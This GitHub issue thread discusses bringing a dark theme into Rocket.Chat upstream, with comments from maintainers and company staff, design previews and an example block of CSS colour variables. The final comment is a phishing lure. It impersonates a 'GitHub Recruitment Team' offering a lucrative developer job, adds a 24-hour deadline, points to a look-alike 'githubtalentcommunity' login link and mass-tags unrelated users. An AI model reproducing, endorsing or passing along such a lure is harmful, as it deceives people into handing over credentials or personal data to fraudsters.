### ISSUE TITLE
Merge into rocketchat?

### ISSUE THREAD

**Issue by danger89** [pbaity/rocketchat-dark-mode#27]
Any idea to make this fanatic feature upstream available within rocket chat by default?

That would be really nice. Please, consider doing/trying so.

Regards,
Melroy

**Comment by pbaity** [comment]
Hi and welcome Melroy! Happy to hear you find this project worthwhile enough to want to see it sent upstream. So do I. That being said, there are two big things stopping me from pushing this upstream as-is:

1. A lot of people want more than just dark mode; they want customizable themes. See the two years worth of comments [on this PR](https://github.com/RocketChat/Rocket.Chat/pull/11071) and [this feature request](https://github.com/RocketChat/feature-requests/issues/143).
2. I've [heard](https://github.com/pbaity/rocketchat-dark-mode/pull/6#issuecomment-583011856) that Rocket.Chat is moving towards using React Native, with dark mode built in. (Can't find where else I've read this, but somewhere.)

But that doesn't mean I'm still not very committed to seeing dark mode in Rocket.Chat. See [my comment](https://github.com/RocketChat/feature-requests/issues/143#issuecomment-599305376) on the feature request and feel free to comment there too. For the time being, I'm leaving this issue open so others can see this and join in pushing for dark mode upstream.

**Comment by danger89** [comment]
Thanks for your fast reply.

To be honest I only see this project regarding React Native, but this is only the Android/iOS App AFAIK. 

See: 
https://github.com/RocketChat/Rocket.Chat.ReactNative

I think in the meanwhile we can use this solution. And later we can always extend it/replace it.

**Comment by brittyazel** [comment]
Yeah after talking with the RocketChat devs I'm not sure if they plan on moving the web client to React. They seemed to indicate that the Meteor version that we have is for the long term

**Comment by rodrigok** [comment]
Hi, Rocket.Chat's CTO here.

We are currently migrating to React using our new UI components library called [Fuselage](https://github.com/RocketChat/Rocket.Chat.Fuselage). Our design team is working right now on a Dark Theme for those components and some changes on Mobile Themes to sync colors with what we are doing for the web.

I'll ask the Design Team to share our ideas here as well, but the implementation on the UI may take a while since we are still far away from the end of the React migration.

**Comment by pbaity** [comment]
@rodrigok Thanks for the update! Great to hear from you directly.

Is the migration to React being done in the open somewhere that contributions can be made? Are there other issues blocking the way to Dark Theme that anyone can pick up now? 

If any of the Design Team is willing to share ideas here, that'd be great. This project has attracted quite a few really cool people who I know are willing and able to help contribute to a Dark Theme, and if there's a roadmap for moving forward, we'd want to be a part of it.

**Comment by rodrigok** [comment]
Sure, the design team will share something here soon.

Regarding the contributions, I'll call @ggazzo here, he is our Front End Lead and may have something to share as well.

Part of our admin area is already running on React, so you can check the Rocket.Chat repo and the Fuselage one.

**Comment by engelgabriel** [comment]
Just a sneak peek of what we are working on:

![image](https://user-images.githubusercontent.com/1000217/81321200-a9eb7380-9068-11ea-9c5d-d930441ce28b.png)

![image](https://user-images.githubusercontent.com/1000217/81321252-bb348000-9068-11ea-81cd-7619d74b7fdb.png)

![image](https://user-images.githubusercontent.com/1000217/81321323-d0a9aa00-9068-11ea-96d3-f04d43c7229d.png)

**Comment by ankar84** [comment]
> Just a sneak peek of what we are working on:

It looks really fantastic! 👍🏻
And I see channels avatar implemented. A lot of people including me waiting that feature.

**Comment by ae5960e8-a6fc-491f-b252-898ecf59af95** [comment]
> 

Mr Engel, do you have a progress update on this matter for us? Thank you.

**Comment by chlab** [comment]
@engelgabriel is this now available?

**Comment by geekgonecrazy** [comment]
This should be getting even easier to do with coming versions.  Had a conversation with some of frontends.  

Example:
```
actually now its just a matter of set css vars (not all of them are here, but a small example)
```
:root {
    --rcx-color-background-light: #525252;
    --rcx-color-background-tint: #656566;
    --rcx-color-stroke-extra-light: #3C3D3D;
    --rcx-color-stroke-light: #5E6061;
    --rcx-color-stroke-extra-light-highlight: #3F474D;
    --rcx-color-stroke-highlight: #0A377A;
    --rcx-color-surface-light: #3B3B3B;
    --rcx-color-surface-tint: #353536;
    --rcx-color-surface-neutral: #7C7E80;
    --rcx-color-surface-hover: #1B1C1C;
    --rcx-color-surface-disabled: #1E1E1F;
    --rcx-color-surface-dark: #C1DAFF;
    --rcx-color-font-white: #E3E3E3;
    --rcx-color-font-default: #A3B4D4;
    --rcx-color-font-titles-labels: #9EB3D1;
    --rcx-color-font-disabled: #434445;
    --rcx-color-font-annotation: #B8BDC4;
    --rcx-color-font-hint: #959DA8;
    --rcx-color-font-secondary-info: #99A2AD;
    --rcx-color-status-background-info: #3B5670;
    --rcx-color-status-font-on-info: #7A9DD2;
    --rcx-color-button-background-secondary-default: #282829;
    --rcx-color-button-font-on-secondary: #8D9FBA;
    --rcx-color-status-fonts-on-info: #8AB9EB;
}
```

I believe our design team is still working on some final values here to make dark mode

**Comment by geekgonecrazy** [comment]
yes for sure!  This is why we did go ahead and leave it hidden.  We still have several components that need to still be replaced in order for it to have proper coverage across all components.

**Comment by pbaity** [comment]
That's exciting, @geekgonecrazy ! I really appreciate your and your team's hard work on this. Looking forward to seeing it continue to develop.

**Comment by paulchen** [comment]
As far as I can see, in Rocket.Chat 6.0.0, the built-in dark mode is available to the general public (i.e. without enabling it in Konami code style).

**Comment by sherlok235** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
hanchi27, @manageC0d, @ygzyr, @mich15, @abduljabbarweb, @0x-Js, @oguzhan81, @berkantkas53, @cpowlett, @zhangbx529, @10urunal, @nativia, @chelalama, @oguzhan33, @zeliy, @no7dw, @silom2000, @titanx25, @shahroozam, @mattstyles333
